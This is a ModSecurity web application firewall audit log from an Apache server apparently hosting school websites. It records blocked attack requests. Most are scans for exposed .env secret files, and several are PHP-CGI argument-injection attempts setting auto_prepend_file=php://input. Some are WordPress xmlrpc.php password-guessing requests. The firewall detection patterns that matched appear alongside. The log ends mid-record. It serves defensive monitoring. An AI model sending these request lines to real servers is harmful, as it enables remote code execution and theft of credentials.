HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1fbe65f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744723324751544 805 (- - -) Stopwatch2: 1744723324751544 805; combined=333, p1=292, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1fbe65f-Z-- --6112cd37-A-- [15/Apr/2025:22:44:18 +0700] Z_5-0iULYKh39tLgM0CTNAAAAEs 103.236.140.4 43408 103.236.140.4 8181 --6112cd37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ko-kr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 --6112cd37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6112cd37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744731858950945 886 (- - -) Stopwatch2: 1744731858950945 886; combined=371, p1=328, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6112cd37-Z-- --525e0623-A-- [15/Apr/2025:22:58:00 +0700] Z_6CCKXLWI2MDahumW9_JgAAANU 103.236.140.4 43566 103.236.140.4 8181 --525e0623-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 37.114.63.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.114.63.53 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --525e0623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --525e0623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744732680393718 956 (- - -) Stopwatch2: 1744732680393718 956; combined=378, p1=338, p2=0, p3=0, p4=0, p5=40, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --525e0623-Z-- --3874f16c-A-- [15/Apr/2025:23:03:27 +0700] Z_6DTyULYKh39tLgM0CTXgAAAEM 103.236.140.4 43600 103.236.140.4 8181 --3874f16c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ELE-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3874f16c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3874f16c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744733007058296 822 (- - -) Stopwatch2: 1744733007058296 822; combined=325, p1=284, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3874f16c-Z-- --b6d6fe77-A-- [15/Apr/2025:23:36:12 +0700] Z_6K_KXLWI2MDahumW9_OQAAAMM 103.236.140.4 43804 103.236.140.4 8181 --b6d6fe77-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b6d6fe77-C-- --b6d6fe77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6d6fe77-E-- --b6d6fe77-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744734972504349 4751 (- - -) Stopwatch2: 1744734972504349 4751; combined=2940, p1=544, p2=2366, p3=0, p4=0, p5=30, sr=132, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6d6fe77-Z-- --0e61b20e-A-- [15/Apr/2025:23:56:54 +0700] Z_6P1iULYKh39tLgM0CTdwAAAFY 103.236.140.4 43860 103.236.140.4 8181 --0e61b20e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0e61b20e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e61b20e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744736214825167 825 (- - -) Stopwatch2: 1744736214825167 825; combined=358, p1=317, p2=0, p3=0, p4=0, p5=40, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e61b20e-Z-- --388d5a42-A-- [15/Apr/2025:23:56:58 +0700] Z_6P2qXLWI2MDahumW9_PwAAANM 103.236.140.4 43864 103.236.140.4 8181 --388d5a42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --388d5a42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388d5a42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744736218865069 839 (- - -) Stopwatch2: 1744736218865069 839; combined=362, p1=320, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388d5a42-Z-- --b491fb6c-A-- [16/Apr/2025:00:22:58 +0700] Z_6V8s-f7AifS1fst96C-gAAAAQ 103.236.140.4 44096 103.236.140.4 8181 --b491fb6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --b491fb6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b491fb6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744737778806102 896 (- - -) Stopwatch2: 1744737778806102 896; combined=403, p1=362, p2=0, p3=0, p4=0, p5=40, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b491fb6c-Z-- --8c59c10b-A-- [16/Apr/2025:00:27:51 +0700] Z_6XF8-f7AifS1fst96C-wAAABc 103.236.140.4 44098 103.236.140.4 8181 --8c59c10b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --8c59c10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c59c10b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744738071691929 844 (- - -) Stopwatch2: 1744738071691929 844; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c59c10b-Z-- --92fded76-A-- [16/Apr/2025:01:01:06 +0700] Z_6e4s-f7AifS1fst96DQgAAAA4 103.236.140.4 45112 103.236.140.4 8181 --92fded76-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.4.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.4.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92fded76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92fded76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744740066547828 875 (- - -) Stopwatch2: 1744740066547828 875; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92fded76-Z-- --c5bdf07a-A-- [16/Apr/2025:01:51:35 +0700] Z_6qt81f8LoF-Pq3UL4VpQAAAJY 103.236.140.4 45276 103.236.140.4 8181 --c5bdf07a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 116.198.231.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 116.198.231.35 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c5bdf07a-C-- --c5bdf07a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5bdf07a-E-- --c5bdf07a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744743095209599 4678 (- - -) Stopwatch2: 1744743095209599 4678; combined=3085, p1=473, p2=2581, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5bdf07a-Z-- --40240255-A-- [16/Apr/2025:07:30:47 +0700] Z_76Nxk9XPLR9cFiTEu7FwAAABc 103.236.140.4 49278 103.236.140.4 8181 --40240255-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 Accept-Charset: utf-8 --40240255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40240255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744763447866956 877 (- - -) Stopwatch2: 1744763447866956 877; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40240255-Z-- --c445d810-A-- [16/Apr/2025:07:50:18 +0700] Z_7-yk-sESiKFppgz04V4AAAAMg 103.236.140.4 49430 103.236.140.4 8181 --c445d810-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.101 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c445d810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c445d810-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744764618904517 696 (- - -) Stopwatch2: 1744764618904517 696; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c445d810-Z-- --56d2e44a-A-- [16/Apr/2025:07:50:35 +0700] Z_7-2ype92T0H9-Aa0y15gAAAEU 103.236.140.4 49434 103.236.140.4 8181 --56d2e44a-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.101 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --56d2e44a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d2e44a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744764635564321 12750 (- - -) Stopwatch2: 1744764635564321 12750; combined=24155, p1=271, p2=0, p3=0, p4=0, p5=11961, sr=74, sw=0, l=0, gc=11923 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d2e44a-Z-- --a84a3d3e-A-- [16/Apr/2025:09:13:45 +0700] Z_8SWSpe92T0H9-Aa0y2AwAAAE4 103.236.140.4 50510 103.236.140.4 8181 --a84a3d3e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --a84a3d3e-C-- --a84a3d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84a3d3e-E-- --a84a3d3e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744769625528436 5043 (- - -) Stopwatch2: 1744769625528436 5043; combined=3020, p1=534, p2=2453, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84a3d3e-Z-- --3461d16f-A-- [16/Apr/2025:09:38:22 +0700] Z_8YHipe92T0H9-Aa0y2DgAAAEg 103.236.140.4 50710 103.236.140.4 8181 --3461d16f-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.163.182.227 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Cookie: X-Forwarded-For: 194.163.182.227 Accept-Encoding: gzip X-Varnish: 126626352 --3461d16f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3461d16f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744771102246237 911 (- - -) Stopwatch2: 1744771102246237 911; combined=347, p1=305, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3461d16f-Z-- --54128e26-A-- [16/Apr/2025:11:00:55 +0700] Z_8rdype92T0H9-Aa0y2VgAAAFU 103.236.140.4 51384 103.236.140.4 8181 --54128e26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54128e26-C-- wp.getUsersBlogs admin 123456789 --54128e26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54128e26-E-- --54128e26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776055268505 4500 (- - -) Stopwatch2: 1744776055268505 4500; combined=3415, p1=391, p2=2780, p3=0, p4=0, p5=140, sr=118, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54128e26-Z-- --707c036e-A-- [16/Apr/2025:11:01:55 +0700] Z_8rsype92T0H9-Aa0y2kwAAAEw 103.236.140.4 51704 103.236.140.4 8181 --707c036e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --707c036e-C-- wp.getUsersBlogs admin Marketing2010 --707c036e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --707c036e-E-- --707c036e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776115311929 5587 (- - -) Stopwatch2: 1744776115311929 5587; combined=3994, p1=505, p2=3244, p3=0, p4=0, p5=142, sr=104, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --707c036e-Z-- --91d0f862-A-- [16/Apr/2025:11:02:55 +0700] Z_8r70-sESiKFppgz04XQAAAAM4 103.236.140.4 51990 103.236.140.4 8181 --91d0f862-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http 